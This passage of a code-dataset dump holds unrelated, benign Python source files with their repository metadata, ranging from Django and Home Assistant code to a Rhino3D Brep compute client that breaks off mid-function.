FlashScope))
def test_expose_invalid_flash(self):
"""FlashContextProcessor: should fail when exposing an invalid object as being the flash.
"""
self.request.flash = 'Invalid object'
self.assertRaises(SuspiciousOperation, flash, self.request)
| 33.1 | 97 | 0.706949 | 147 | 1,324 | 6.265306 | 0.394558 | 0.083605 | 0.078176 | 0.091205 | 0.312704 | 0.2519 | 0.093377 | 0.093377 | 0.093377 | 0 | 0 | 0.000943 | 0.199396 | 1,324 | 39 | 98 | 33.948718 | 0.867925 | 0.294562 | 0 | 0 | 0 | 0 | 0.015436 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 1 | 0.210526 | false | 0 | 0.263158 | 0 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
fcdf356a0b95d5923efc711b67b00cf106ae3fd4 | 1,102 | py | Python | data/base/base_extractor.py | yovelcohen/ccl | ba2abe609110f21f1db7c0c95f785e4010df8abd | [
"MIT"
] | null | null | null | data/base/base_extractor.py | yovelcohen/ccl | ba2abe609110f21f1db7c0c95f785e4010df8abd | [
"MIT"
] | null | null | null | data/base/base_extractor.py | yovelcohen/ccl | ba2abe609110f21f1db7c0c95f785e4010df8abd | [
"MIT"
] | null | null | null | from typing import Optional
import requests
from data.base.base_data_class import BaseDataProcess
class BaseExtractor(BaseDataProcess):
    @classmethod
    def extract(cls, *args, **kwargs):
        raise NotImplementedError


class BaseAPIExtractor(BaseExtractor):
    def get_headers(self):
        return {}

    def get_url(self):
        raise NotImplementedError

    def get_url_params(self, params: Optional[dict] = None):
        raise NotImplementedError

    def get_request_body(self, data: Optional[dict] = None):
        return None

    def handle_call_response(self, response):
        """
        Parse the API response data, raising errors and logging as needed.
        """
        raise NotImplementedError

    def make_api_call(self, url_params: Optional[dict] = None, body_params: Optional[dict] = None):
        url = self.get_url()
        headers = self.get_headers()
        body = self.get_request_body(body_params)
        params = self.get_url_params(url_params)
        resp = requests.get(url=url, headers=headers, params=params, data=body)
        return resp
| 27.55 | 99 | 0.683303 | 132 | 1,102 | 5.537879 | 0.340909 | 0.04104 | 0.087551 | 0.090287 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.23412 | 1,102 | 39 | 100 | 28.25641 | 0.866114 | 0.068058 | 0 | 0.16 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.28 | false | 0 | 0.12 | 0.08 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
fce6603b5dad35c766145b59c395cc640151cb3c | 424 | py | Python | ivy/doc/examples/udp_test_expect.py | b1f6c1c4/cfg-enum | 1a08071bde87f578ceaf834004c01b593db9bce8 | [
"BSD-3-Clause"
] | 113 | 2019-05-09T15:37:47.000Z | 2022-03-14T04:02:01.000Z | ivy/doc/examples/udp_test_expect.py | b1f6c1c4/cfg-enum | 1a08071bde87f578ceaf834004c01b593db9bce8 | [
"BSD-3-Clause"
] | 58 | 2019-09-03T15:42:29.000Z | 2021-01-15T02:20:29.000Z | ivy/doc/examples/udp_test_expect.py | b1f6c1c4/cfg-enum | 1a08071bde87f578ceaf834004c01b593db9bce8 | [
"BSD-3-Clause"
] | 40 | 2016-01-02T19:13:18.000Z | 2018-10-27T11:38:00.000Z | import pexpect
import sys


def run(name, opts, res):
    child = pexpect.spawn('./{}'.format(name))
    child.logfile = sys.stdout
    try:
        child.expect('>')
        child.sendline('foo.send(0,1,2)')
        child.expect(r'< foo.recv\(1,2\)')
        child.sendline('foo.send(1,0,3)')
        child.expect(r'foo.recv\(0,3\)')
        return True
    except pexpect.EOF:
        print(child.before)
        return False
| 24.941176 | 46 | 0.570755 | 59 | 424 | 4.101695 | 0.525424 | 0.136364 | 0.132231 | 0.165289 | 0.157025 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031646 | 0.254717 | 424 | 16 | 47 | 26.5 | 0.734177 | 0 | 0 | 0 | 0 | 0 | 0.158019 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.133333 | null | null | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fceaf9fd2340a5d546f20a5d9c09da2d4e7e2c0c | 1,237 | py | Python | 2018/day4.py | dimkarakostas/advent-of-code | fb9c12eabc3342c607e24da1edeb7e5643400263 | [
"MIT"
] | 2 | 2018-12-06T09:39:35.000Z | 2020-12-18T19:38:40.000Z | 2018/day4.py | dimkarakostas/advent-of-code | fb9c12eabc3342c607e24da1edeb7e5643400263 | [
"MIT"
] | null | null | null | 2018/day4.py | dimkarakostas/advent-of-code | fb9c12eabc3342c607e24da1edeb7e5643400263 | [
"MIT"
] | null | null | null | import operator
from collections import defaultdict
with open('input4', 'r') as f:
    events = sorted(f.readlines())

guard_shifts = defaultdict(list)
guard_totals = defaultdict(int)
guard_id = ''
for e in events:
    e = e.split()
    if e[-1] == 'shift':
        guard_id = int(e[3][1:])
    if e[-1] in ['asleep', 'up']:
        guard_shifts[guard_id].append(int(e[1][3:5]))
    if e[-1] == 'up':
        guard_totals[guard_id] += guard_shifts[guard_id][-1] - guard_shifts[guard_id][-2]

max_guard = (0, 0, 0)
guard_mins = {}
for guard_id in guard_shifts:
    guard_mins[guard_id] = [0 for _ in range(60)]
    shifts = guard_shifts[guard_id]
    for idx in range(0, len(shifts), 2):
        start = shifts[idx]
        stop = shifts[idx + 1]
        for m in range(start, stop):
            guard_mins[guard_id][m] += 1
    max_idx = int(guard_mins[guard_id].index(max(guard_mins[guard_id])))
    if guard_mins[guard_id][max_idx] > max_guard[2]:
        max_guard = (guard_id, max_idx, guard_mins[guard_id][max_idx])

guard_id = max(guard_totals.items(), key=operator.itemgetter(1))[0]
print('Part 1:', guard_id * int(guard_mins[guard_id].index(max(guard_mins[guard_id]))))
print('Part 2:', max_guard[0] * max_guard[1])
| 32.552632 | 93 | 0.63945 | 202 | 1,237 | 3.683168 | 0.242574 | 0.178763 | 0.150538 | 0.172043 | 0.198925 | 0.174731 | 0.115591 | 0.115591 | 0.115591 | 0.115591 | 0 | 0.028254 | 0.198868 | 1,237 | 37 | 94 | 33.432432 | 0.722503 | 0 | 0 | 0 | 0 | 0 | 0.029103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.064516 | null | null | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fcf38cb8f2a74c4130c1e494bd0e1b74f74a0df4 | 187 | py | Python | writeData.py | Aksonik/quickPyPlot | c5b202e954f86f664dd9ced98e9860c2ac1be06a | [
"MIT"
] | null | null | null | writeData.py | Aksonik/quickPyPlot | c5b202e954f86f664dd9ced98e9860c2ac1be06a | [
"MIT"
] | null | null | null | writeData.py | Aksonik/quickPyPlot | c5b202e954f86f664dd9ced98e9860c2ac1be06a | [
"MIT"
] | null | null | null | class writeDataClass():
    def writeData(self, dataFiles):
        fileData = open("plt.dat", "w")
        for f in range(0, len(dataFiles)):
            fileData.write("%s\n" % dataFiles[f])
        fileData.close()
| 17 | 40 | 0.668449 | 26 | 187 | 4.807692 | 0.807692 | 0.272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00625 | 0.144385 | 187 | 10 | 41 | 18.7 | 0.775 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fcf39bf7ff16b2c3cf73f563a23b1166cb813450 | 474 | py | Python | people/forms.py | JimInCO/bishopric_tools | 6d7ddee52eb1f5884b051d9cb2eab9c241663423 | [
"MIT"
] | null | null | null | people/forms.py | JimInCO/bishopric_tools | 6d7ddee52eb1f5884b051d9cb2eab9c241663423 | [
"MIT"
] | 2 | 2020-03-09T04:49:55.000Z | 2020-03-10T04:08:16.000Z | people/forms.py | JimInCO/bishopric_tools | 6d7ddee52eb1f5884b051d9cb2eab9c241663423 | [
"MIT"
] | null | null | null | from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from django import forms
from people.models import Member
class MemberAddForm(forms.ModelForm):
    class Meta:
        model = Member
        exclude = ["active"]

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.helper = FormHelper()
        self.helper.add_input(Submit("submit", "Create Member"))
        self.helper.form_id = "add-form"
| 26.333333 | 64 | 0.677215 | 57 | 474 | 5.421053 | 0.526316 | 0.097087 | 0.097087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21308 | 474 | 17 | 65 | 27.882353 | 0.828418 | 0 | 0 | 0 | 0 | 0 | 0.06962 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.307692 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1e060c1f35b19e4fa9cc45cd4bbf4d474fcfe0a9 | 716 | py | Python | homeassistant/components/energy/__init__.py | Andrew55529/core | c440a30aff0d8f573d8aa0d949068702dd36c386 | [
"Apache-2.0"
] | 1 | 2021-07-31T21:08:49.000Z | 2021-07-31T21:08:49.000Z | homeassistant/components/energy/__init__.py | flexy2dd/core | 1019ee22ff13e5f542e868179d791e6a0d87369a | [
"Apache-2.0"
] | 70 | 2020-07-16T02:07:46.000Z | 2022-03-31T06:01:48.000Z | homeassistant/components/energy/__init__.py | flexy2dd/core | 1019ee22ff13e5f542e868179d791e6a0d87369a | [
"Apache-2.0"
] | 1 | 2020-03-09T19:15:38.000Z | 2020-03-09T19:15:38.000Z | """The Energy integration."""
from __future__ import annotations
from homeassistant.components import frontend
from homeassistant.core import HomeAssistant
from homeassistant.helpers import discovery
from homeassistant.helpers.typing import ConfigType
from . import websocket_api
from .const import DOMAIN
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
    """Set up Energy."""
    websocket_api.async_setup(hass)
    frontend.async_register_built_in_panel(hass, DOMAIN, DOMAIN, "mdi:lightning-bolt")

    hass.async_create_task(
        discovery.async_load_platform(hass, "sensor", DOMAIN, {}, config)
    )

    hass.data[DOMAIN] = {
        "cost_sensors": {},
    }

    return True
| 27.538462 | 86 | 0.743017 | 84 | 716 | 6.130952 | 0.52381 | 0.132039 | 0.093204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162011 | 716 | 25 | 87 | 28.64 | 0.858333 | 0.032123 | 0 | 0 | 0 | 0 | 0.053973 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.411765 | 0 | 0.470588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
1e085582e8db64dd99eb9d89c66830c3c453bdd6 | 342 | py | Python | lesson 1/p8-highest.py | hamburgcodingschool/L2C-1903 | 759c273edb4b2e1685c28f932694f7a5a1e2b0a1 | [
"MIT"
] | null | null | null | lesson 1/p8-highest.py | hamburgcodingschool/L2C-1903 | 759c273edb4b2e1685c28f932694f7a5a1e2b0a1 | [
"MIT"
] | null | null | null | lesson 1/p8-highest.py | hamburgcodingschool/L2C-1903 | 759c273edb4b2e1685c28f932694f7a5a1e2b0a1 | [
"MIT"
] | null | null | null |
# print("Please insert a number")
# a = int(input("> "))
# print("Please insert another number")
# b = int(input("> "))
# print("Please insert yet another number")
# c = int(input("> "))
a = 4
b = 5
c = 10
if a > b:
if a > c:
print(a)
else:
print(c)
else:
if b > c:
print(b)
else:
print(c) | 14.25 | 43 | 0.494152 | 51 | 342 | 3.313725 | 0.313725 | 0.195266 | 0.301775 | 0.224852 | 0.295858 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017316 | 0.324561 | 342 | 24 | 44 | 14.25 | 0.714286 | 0.508772 | 0 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.307692 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1e1f0a6daa16d5e3e8cb26636dfce0d7bc6d2104 | 1,010 | py | Python | hase/symbex/procedures/helper.py | bet4it/hase | 35022b6142ae43e48b6cf3b0d719a2743e37660e | [
"BSD-2-Clause"
] | 69 | 2018-04-05T15:16:13.000Z | 2022-01-09T21:23:09.000Z | hase/symbex/procedures/helper.py | bet4it/hase | 35022b6142ae43e48b6cf3b0d719a2743e37660e | [
"BSD-2-Clause"
] | 28 | 2018-05-09T04:08:39.000Z | 2019-03-12T11:41:47.000Z | hase/symbex/procedures/helper.py | bet4it/hase | 35022b6142ae43e48b6cf3b0d719a2743e37660e | [
"BSD-2-Clause"
] | 6 | 2018-04-19T20:47:43.000Z | 2020-09-03T17:04:44.000Z | import angr
from ... import errors
# Need to resymbolize hooks
def test_concrete_value(proc, sym, value):
    if not proc.state.solver.symbolic(sym):
        if proc.state.solver.eval(sym) == value:
            return True
    return False


def errno_success(proc):
    return proc.state.solver.If(
        proc.state.solver.BoolS("errno"),
        proc.state.solver.BVV(0, proc.state.arch.bits),
        proc.state.solver.BVV(-1, proc.state.arch.bits),
    )


def null_success(proc, sym):
    return proc.state.solver.If(
        proc.state.solver.BoolS("errno"),
        sym,
        proc.state.solver.BVV(0, proc.state.arch.bits),
    )


def minmax(proc, sym, upper=None):
    try:
        min_v = proc.state.solver.min(sym)
        max_v = proc.state.solver.max(sym)
        if upper:
            return max(min_v, min(max_v, upper))
        return max_v
    except angr.SimUnsatError:
        if upper:
            return upper
        else:
            raise errors.HaseError("Cannot eval value")
| 23.488372 | 56 | 0.610891 | 139 | 1,010 | 4.374101 | 0.323741 | 0.207237 | 0.271382 | 0.083882 | 0.314145 | 0.276316 | 0.276316 | 0.276316 | 0.276316 | 0.157895 | 0 | 0.004054 | 0.267327 | 1,010 | 42 | 57 | 24.047619 | 0.817568 | 0.024752 | 0 | 0.258065 | 0 | 0 | 0.027467 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0.064516 | 0.064516 | 0.419355 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1e26d24bae72fb15208d8205bdc097db6b815769 | 435 | py | Python | src/training/listen/Listen.py | sbetageri/ralph | 7449c78342b49ea79a26189fc749eecd64e775c8 | [
"MIT"
] | null | null | null | src/training/listen/Listen.py | sbetageri/ralph | 7449c78342b49ea79a26189fc749eecd64e775c8 | [
"MIT"
] | null | null | null | src/training/listen/Listen.py | sbetageri/ralph | 7449c78342b49ea79a26189fc749eecd64e775c8 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
class ListenNet(nn.Module):
    def __init__(self, device):
        super(ListenNet, self).__init__()
        self.lstm = nn.LSTM(input_size=13, hidden_size=256, num_layers=3)
        self.lstm = self.lstm.to(device)

    def forward(self, x):
        # lstm_out: (seq_len, batch, hidden_size); hidden: (num_layers, batch, hidden_size)
        lstm_out, (hidden, carry) = self.lstm(x)
        # Return the last layer's final hidden state. The original hidden[:, -1]
        # indexed the batch dimension rather than the layer dimension.
        return lstm_out, hidden[-1]

    def get_parameters(self):
        return self.lstm.parameters()
1e407cc6c79f1ba3f1ed19e45d791c550ce33056 | 849 | py | Python | woffle/embed/numeric/fasttext/embed.py | karetsu/chatter | f93a2749b28187e63768dce0c9de29203c8868cb | [
"MIT"
] | 5 | 2019-03-06T14:35:46.000Z | 2022-01-15T22:33:59.000Z | woffle/embed/numeric/fasttext/embed.py | karetsu/chatter | f93a2749b28187e63768dce0c9de29203c8868cb | [
"MIT"
] | 29 | 2018-12-03T12:47:19.000Z | 2019-01-21T14:58:46.000Z | woffle/embed/numeric/fasttext/embed.py | karetsu/chatter | f93a2749b28187e63768dce0c9de29203c8868cb | [
"MIT"
] | 2 | 2018-12-12T14:41:14.000Z | 2018-12-14T20:53:01.000Z | """
fasttext embedding functionality
The important function here is 'embed' which has signature
embed :: String -> [Float], everything else should just be part of it
"""
#-- Imports ---------------------------------------------------------------------
# base
import functools
from typing import List, NewType
# third party
import fastText
import toml
#-- Type synonyms ---------------------------------------------------------------
Model = NewType('Model', fastText.FastText._FastText)
#-- Definitions -----------------------------------------------------------------
# variables
config = toml.load('config.ini')
model = fastText.load_model(config['fasttext']['model'])
def embedding(m: Model, x: str) -> List[float]:
    return m.get_word_vector(x)
embed_ = functools.partial(embedding, model)
embed = functools.partial(map, embed_)
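The two `functools.partial` calls at the end build `embed` as a small pipeline: `embed_` fixes the model argument of `embedding`, and `embed` maps it over an iterable of strings. A self-contained sketch of the same composition, with a toy `embedding` function standing in for the fastText model:

```python
import functools

def embedding(model, word):
    # Toy stand-in for fastText's get_word_vector: a length-based "vector".
    return [float(len(word)), float(model['dim'])]

model = {'dim': 3}
embed_ = functools.partial(embedding, model)   # fix the model argument
embed = functools.partial(map, embed_)         # lift to iterables of words

print(list(embed(['hi', 'there'])))  # [[2.0, 3.0], [5.0, 3.0]]
```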
| 24.257143 | 81 | 0.558304 | 84 | 849 | 5.571429 | 0.607143 | 0.055556 | 0.089744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117786 | 849 | 34 | 82 | 24.970588 | 0.624833 | 0.506478 | 0 | 0 | 0 | 0 | 0.068966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0.090909 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1e421cde1fb53f5b4e2b4043c5d9512adee1d626 | 401 | py | Python | db.py | maxriposati/grupo43 | e22ca0a183bfe891f9ba0a46354c9390b739fe46 | [
"MIT"
] | null | null | null | db.py | maxriposati/grupo43 | e22ca0a183bfe891f9ba0a46354c9390b739fe46 | [
"MIT"
] | null | null | null | db.py | maxriposati/grupo43 | e22ca0a183bfe891f9ba0a46354c9390b739fe46 | [
"MIT"
] | null | null | null | import sqlite3
from sqlite3 import Error
from flask import g
def get_db():
    try:
        if 'db' not in g:
            g.db = sqlite3.connect('db/database.db')
        return g.db
    except Error as e:
        # Print the actual exception instance, not the Error class itself.
        print(e)


def close_db():
    db = g.pop('db', None)
    if db is not None:
        db.close()
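The `get_db`/`close_db` pair is the usual lazy per-request connection pattern: connect on first access, cache the handle, close it at teardown. A self-contained sketch of the same pattern using an in-memory database and a plain dict standing in for Flask's `g` (names here are illustrative, not part of the original module):

```python
import sqlite3

g = {}  # stand-in for flask.g

def get_db(path=':memory:'):
    # Connect lazily and cache the handle so repeated calls reuse it.
    if 'db' not in g:
        g['db'] = sqlite3.connect(path)
    return g['db']

def close_db():
    # Remove the cached handle and close it, if one was ever opened.
    db = g.pop('db', None)
    if db is not None:
        db.close()

conn = get_db()
assert get_db() is conn  # cached: same connection object on the second call
close_db()
```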
| 19.095238 | 51 | 0.591022 | 60 | 401 | 3.9 | 0.4 | 0.111111 | 0.145299 | 0.205128 | 0.42735 | 0.42735 | 0.42735 | 0.42735 | 0.42735 | 0 | 0 | 0.018382 | 0.321696 | 401 | 20 | 52 | 20.05 | 0.841912 | 0 | 0 | 0.235294 | 0 | 0 | 0.047244 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.352941 | 0 | 0.529412 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
1e43a2fc2bcfec9b5d86445633aabea08a83f0a3 | 20,363 | py | Python | src/compute.client/python_client/compute_rhino3d/Brep.py | EmilPoulsen/compute.rhino3d | 05a1bd43e5f319eb313032f99bdd2624c4ea9e42 | [
"MIT"
] | 1 | 2022-02-20T19:01:48.000Z | 2022-02-20T19:01:48.000Z | src/compute.client/python_client/compute_rhino3d/Brep.py | interopxyz/compute.rhino3d | 05a1bd43e5f319eb313032f99bdd2624c4ea9e42 | [
"MIT"
] | null | null | null | src/compute.client/python_client/compute_rhino3d/Brep.py | interopxyz/compute.rhino3d | 05a1bd43e5f319eb313032f99bdd2624c4ea9e42 | [
"MIT"
] | 5 | 2018-10-27T17:06:15.000Z | 2019-04-07T10:31:08.000Z | from . import Util
def ChangeSeam(face, direction, parameter, tolerance):
args = [face, direction, parameter, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/changeseam-brepface_int_double_double", args)
return response
def CopyTrimCurves(trimSource, surfaceSource, tolerance):
args = [trimSource, surfaceSource, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/copytrimcurves-brepface_surface_double", args)
return response
def CreateBaseballSphere(center, radius, tolerance):
args = [center, radius, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbaseballsphere-point3d_double_double", args)
return response
def CreateDevelopableLoft(crv0, crv1, reverse0, reverse1, density):
args = [crv0, crv1, reverse0, reverse1, density]
response = Util.ComputeFetch("rhino/geometry/brep/createdevelopableloft-curve_curve_bool_bool_int", args)
return response
def CreateDevelopableLoft1(rail0, rail1, fixedRulings):
args = [rail0, rail1, fixedRulings]
response = Util.ComputeFetch("rhino/geometry/brep/createdevelopableloft-nurbscurve_nurbscurve_point2darray", args)
return response
def CreatePlanarBreps(inputLoops):
args = [inputLoops]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-curvearray", args)
return response
def CreatePlanarBreps1(inputLoops, tolerance):
args = [inputLoops, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-curvearray_double", args)
return response
def CreatePlanarBreps2(inputLoop):
args = [inputLoop]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-curve", args)
return response
def CreatePlanarBreps3(inputLoop, tolerance):
args = [inputLoop, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-curve_double", args)
return response
def CreateTrimmedSurface(trimSource, surfaceSource):
args = [trimSource, surfaceSource]
response = Util.ComputeFetch("rhino/geometry/brep/createtrimmedsurface-brepface_surface", args)
return response
def CreateTrimmedSurface1(trimSource, surfaceSource, tolerance):
args = [trimSource, surfaceSource, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createtrimmedsurface-brepface_surface_double", args)
return response
def CreateFromCornerPoints(corner1, corner2, corner3, tolerance):
args = [corner1, corner2, corner3, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromcornerpoints-point3d_point3d_point3d_double", args)
return response
def CreateFromCornerPoints1(corner1, corner2, corner3, corner4, tolerance):
args = [corner1, corner2, corner3, corner4, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromcornerpoints-point3d_point3d_point3d_point3d_double", args)
return response
def CreateEdgeSurface(curves):
args = [curves]
response = Util.ComputeFetch("rhino/geometry/brep/createedgesurface-curvearray", args)
return response
# NOTE: this and the following CreatePlanarBreps1 redefine (and therefore
# shadow) the functions of the same names defined above.
def CreatePlanarBreps(inputLoops):
args = [inputLoops]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-rhino.collections.curvelist", args)
return response
def CreatePlanarBreps1(inputLoops, tolerance):
args = [inputLoops, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-rhino.collections.curvelist_double", args)
return response
def CreateFromOffsetFace(face, offsetDistance, offsetTolerance, bothSides, createSolid):
args = [face, offsetDistance, offsetTolerance, bothSides, createSolid]
response = Util.ComputeFetch("rhino/geometry/brep/createfromoffsetface-brepface_double_double_bool_bool", args)
return response
def CreateSolid(breps, tolerance):
args = [breps, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createsolid-breparray_double", args)
return response
def MergeSurfaces(surface0, surface1, tolerance, angleToleranceRadians):
args = [surface0, surface1, tolerance, angleToleranceRadians]
response = Util.ComputeFetch("rhino/geometry/brep/mergesurfaces-surface_surface_double_double", args)
return response
def MergeSurfaces1(brep0, brep1, tolerance, angleToleranceRadians):
args = [brep0, brep1, tolerance, angleToleranceRadians]
response = Util.ComputeFetch("rhino/geometry/brep/mergesurfaces-brep_brep_double_double", args)
return response
def MergeSurfaces2(brep0, brep1, tolerance, angleToleranceRadians, point0, point1, roundness, smooth):
args = [brep0, brep1, tolerance, angleToleranceRadians, point0, point1, roundness, smooth]
response = Util.ComputeFetch("rhino/geometry/brep/mergesurfaces-brep_brep_double_double_point2d_point2d_double_bool", args)
return response
def CreatePatch(geometry, startingSurface, tolerance):
args = [geometry, startingSurface, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createpatch-geometrybasearray_surface_double", args)
return response
def CreatePatch1(geometry, uSpans, vSpans, tolerance):
args = [geometry, uSpans, vSpans, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createpatch-geometrybasearray_int_int_double", args)
return response
def CreatePatch2(geometry, startingSurface, uSpans, vSpans, trim, tangency, pointSpacing, flexibility, surfacePull, fixEdges, tolerance):
args = [geometry, startingSurface, uSpans, vSpans, trim, tangency, pointSpacing, flexibility, surfacePull, fixEdges, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createpatch-geometrybasearray_surface_int_int_bool_bool_double_double_double_boolarray_double", args)
return response
def CreatePipe(rail, radius, localBlending, cap, fitRail, absoluteTolerance, angleToleranceRadians):
args = [rail, radius, localBlending, cap, fitRail, absoluteTolerance, angleToleranceRadians]
response = Util.ComputeFetch("rhino/geometry/brep/createpipe-curve_double_bool_pipecapmode_bool_double_double", args)
return response
def CreatePipe1(rail, railRadiiParameters, radii, localBlending, cap, fitRail, absoluteTolerance, angleToleranceRadians):
args = [rail, railRadiiParameters, radii, localBlending, cap, fitRail, absoluteTolerance, angleToleranceRadians]
response = Util.ComputeFetch("rhino/geometry/brep/createpipe-curve_doublearray_doublearray_bool_pipecapmode_bool_double_double", args)
return response
def CreateFromSweep(rail, shape, closed, tolerance):
args = [rail, shape, closed, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromsweep-curve_curve_bool_double", args)
return response
def CreateFromSweep1(rail, shapes, closed, tolerance):
args = [rail, shapes, closed, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromsweep-curve_curvearray_bool_double", args)
return response
def CreateFromSweep2(rail1, rail2, shape, closed, tolerance):
args = [rail1, rail2, shape, closed, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromsweep-curve_curve_curve_bool_double", args)
return response
def CreateFromSweep3(rail1, rail2, shapes, closed, tolerance):
args = [rail1, rail2, shapes, closed, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromsweep-curve_curve_curvearray_bool_double", args)
return response
def CreateFromSweepInParts(rail1, rail2, shapes, rail_params, closed, tolerance):
args = [rail1, rail2, shapes, rail_params, closed, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromsweepinparts-curve_curve_curvearray_point2darray_bool_double", args)
return response
def CreateFromTaperedExtrude(curveToExtrude, distance, direction, basePoint, draftAngleRadians, cornerType, tolerance, angleToleranceRadians):
args = [curveToExtrude, distance, direction, basePoint, draftAngleRadians, cornerType, tolerance, angleToleranceRadians]
